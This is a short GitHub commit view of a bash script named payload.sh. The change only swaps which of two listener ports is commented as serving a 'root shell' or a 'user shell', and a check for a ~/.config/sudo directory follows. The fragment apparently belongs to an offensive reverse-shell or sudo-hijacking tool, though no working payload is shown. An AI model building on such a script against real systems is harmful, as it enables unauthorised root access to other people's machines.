Update payload.sh

This commit is contained in:
Darkprince
2024-07-01 10:36:07 +05:30
committed by GitHub
parent db2345c35b
commit 94c3342302

View File

@@ -1,8 +1,8 @@
#!/bin/bash #!/bin/bash
LISTENER_IP="127.0.0.1" LISTENER_IP="127.0.0.1"
LISTENER1_PORT="1337" #Listener for user shell LISTENER1_PORT="1337" #Listener for root shell
LISTENER2_PORT="4444" #Listener for root shell LISTENER2_PORT="4444" #Listener for user shell
if [ ! -d ~/.config/sudo ] if [ ! -d ~/.config/sudo ]
then then